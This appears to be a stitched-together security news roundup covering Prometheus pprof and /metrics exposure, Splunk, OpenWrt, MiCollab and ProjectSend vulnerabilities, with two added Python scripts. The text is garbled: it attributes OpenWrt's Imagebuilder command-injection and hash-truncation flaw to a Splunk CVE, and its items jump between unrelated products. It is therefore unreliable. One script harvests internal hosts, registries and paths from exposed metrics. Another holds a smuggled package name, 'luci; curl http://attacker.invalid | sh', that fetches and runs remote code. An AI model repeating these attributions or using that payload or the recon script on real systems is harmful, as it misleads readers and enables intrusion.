Aside from disrupting servers with a flood of requests to "/debug/pprof/heap" (each of which triggers a heap profile) and other pprof endpoints, attackers could also read Prometheus' "/metrics" endpoint, whose metric labels can disclose internal API endpoints, Docker registries, subdomains, and image names that could be leveraged for reconnaissance.
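To show what that reconnaissance looks like in practice, here is an added example (not code from the original report or from Prometheus) that parses the Prometheus text exposition format and pulls hostnames, image references, registries and URL paths out of metric labels. The `/metrics` text is constructed for illustration, and the label names used (`instance`, `handler`, `image`) are common conventions assumed for the sample, not taken from any real target.

```python
import re

# Constructed /metrics sample (not scraped from any real server) showing the
# kinds of label values that leak infrastructure details.
SAMPLE_METRICS = """\
# HELP http_requests_total Total HTTP requests.
# TYPE http_requests_total counter
http_requests_total{handler="/api/v1/internal/billing",instance="billing-svc.internal.example.com:8080",job="billing"} 1027
http_requests_total{handler="/api/v1/internal/users",instance="users-svc.internal.example.com:8080",job="users"} 553
# HELP kube_pod_container_info Information about a container in a pod.
# TYPE kube_pod_container_info gauge
kube_pod_container_info{container="api",image="registry.internal.example.com:5000/payments/api:2.3.1",pod="api-7c9d"} 1
kube_pod_container_info{container="web",image="docker.io/library/nginx:1.25",pod="web-5fd2"} 1
up{instance="prometheus.internal.example.com:9090",job="prometheus"} 1
"""

# One sample line: metric name, optional {labels}, then the value.
SAMPLE_RE = re.compile(
    r'^(?P<name>[A-Za-z_:][A-Za-z0-9_:]*)(?:\{(?P<labels>[^}]*)\})?\s+(?P<value>\S+)'
)
# key="value" pairs inside the braces; values may contain escaped quotes.
LABEL_RE = re.compile(r'(?P<key>[A-Za-z_][A-Za-z0-9_]*)="(?P<val>(?:[^"\\]|\\.)*)"')
# Dotted hostname with an optional :port.
HOST_RE = re.compile(r'^[a-z0-9-]+(?:\.[a-z0-9-]+)+(?::\d+)?$', re.I)


def parse_samples(text):
    """Yield (metric_name, labels, value) for each sample line in exposition text."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SAMPLE_RE.match(line)
        if not m:
            continue
        labels = {
            lab.group("key"): lab.group("val").replace('\\"', '"')
            for lab in LABEL_RE.finditer(m.group("labels") or "")
        }
        yield m.group("name"), labels, m.group("value")


def harvest_recon(text):
    """Classify label values into the recon categories an exposed /metrics leaks."""
    found = {"hosts": set(), "registries": set(), "images": set(), "paths": set()}
    for _name, labels, _value in parse_samples(text):
        for v in labels.values():
            if v.startswith("/"):
                found["paths"].add(v)
            elif "/" in v and ":" in v.rsplit("/", 1)[1]:
                # repo/name:tag shape => container image; a dotted or
                # port-bearing first segment is the registry it was pulled from
                found["images"].add(v)
                first = v.split("/", 1)[0]
                if "." in first or ":" in first:
                    found["registries"].add(first)
            elif HOST_RE.match(v):
                found["hosts"].add(v)
    return {k: sorted(s) for k, s in found.items()}


if __name__ == "__main__":
    for category, items in harvest_recon(SAMPLE_METRICS).items():
        print(category)
        for item in items:
            print("  ", item)
```

Run against a real scrape this is the attacker's view; run against your own servers it is a quick audit of what your labels are giving away before you decide whether `/metrics` belongs behind authentication or a network boundary.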
Updates have been issued by Splunk to address over 15 vulnerabilities impacting its products and third-party dependencies, the most serious of which is a high-severity deserialization of untrusted data bug in Splunk Secure Gateway, tracked as CVE-2024-53247.
The flaw, which could be exploited without authentication, stems from two issues in the Imagebuilder: a command injection in the build process (package names were passed to the build step without sufficient validation, allowing arbitrary commands to run), and a request hash truncated to 12 hexadecimal characters of the SHA-256 digest, which leaves so little entropy that collisions are practical and let a poisoned build artifact be served from the cache to other users, according to OpenWrt.
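The following is an added example, not OpenWrt's or the ASU server's own code, that models the two issues together: a package-name check that rejects shell syntax before the list reaches a build command, a cache key derived from the package list, the birthday-bound arithmetic showing why 12 hex characters (48 bits) is far too short, and a brute-force search that finds two different requests sharing a truncated key. The key derivation (SHA-256 over the sorted package list) and the package-name policy are assumptions made for the illustration; the collision search uses a 5-character truncation so it finishes in well under a second, and the same math scales to 12.

```python
import hashlib
import math
import re

# Assumed package-name policy for the illustration: only characters that
# cannot terminate or chain a shell command are allowed. Not OpenWrt's own rule.
SAFE_PACKAGE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]*$")


def validate_packages(packages):
    """Reject package names that could smuggle shell syntax into the build step."""
    bad = [p for p in packages if not SAFE_PACKAGE.match(p)]
    if bad:
        raise ValueError(f"unsafe package names: {bad}")
    return packages


def request_key(packages, hex_chars=None):
    """Cache key for a build request: SHA-256 of the sorted package list
    (assumed derivation). hex_chars=None keeps the full 64-hex-char digest;
    a small value models the truncated key that makes collisions practical."""
    digest = hashlib.sha256("\n".join(sorted(packages)).encode()).hexdigest()
    return digest[:hex_chars] if hex_chars else digest


def birthday_attempts(hex_chars):
    """Expected number of distinct requests before two share a key of
    4*hex_chars bits: roughly sqrt(pi/2 * 2**bits)."""
    return math.sqrt(math.pi / 2 * 2 ** (4 * hex_chars))


def find_truncated_collision(base, hex_chars, max_tries=5_000_000):
    """Brute-force two different package lists whose truncated keys match.
    Returns (list_a, list_b, shared_key) or None if max_tries is exhausted."""
    seen = {}
    for i in range(max_tries):
        pkgs = base + [f"extra-pkg-{i}"]
        key = request_key(pkgs, hex_chars)
        if key in seen:
            return seen[key], pkgs, key
        seen[key] = pkgs
    return None


if __name__ == "__main__":
    print(f"12 hex chars: about {birthday_attempts(12):.2e} requests to collide")
    print(f"64 hex chars: about {birthday_attempts(64):.2e} requests to collide")
    a, b, key = find_truncated_collision(["base-files", "luci"], 5)
    print(f"truncated key {key} shared by {a[-1]!r} and {b[-1]!r}")
    print("full keys differ:", request_key(a) != request_key(b))
    try:
        validate_packages(["base-files", "luci; curl http://attacker.invalid | sh"])
    except ValueError as e:
        print("rejected:", e)
```

The point of the two numbers is the gap between them: at 48 bits a collision costs on the order of 2^24 hash computations, which a laptop does in seconds, so an attacker who first gets a poisoned image built (via the injection) can then shape a request whose truncated key matches a victim's and have the cache hand that image to them. Keeping the full digest, and validating inputs before they reach `make`, closes both halves.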
Exploitation of CVE-2024-41713, which stems from insufficient input validation in MiCollab's NuPoint Unified Messaging component, could give an unauthenticated attacker access to provisioning data as well as the ability to carry out administrative tasks, according to an analysis from watchTowr Labs.
Most severe of the vulnerabilities is the undocumented features inclusion issue, tracked as CVE-2024-52564, which could be exploited to facilitate remote firewall deactivation, device setting manipulation, and arbitrary OS command execution, according to Japan's Computer Emergency Response Team Coordination Center.
Most severe of the newly added vulnerabilities was the critical improper authentication flaw in the open-source file sharing web app ProjectSend, tracked as CVE-2024-11680, which could be leveraged to enable malicious account creation, webshell uploads, and JavaScript embedding.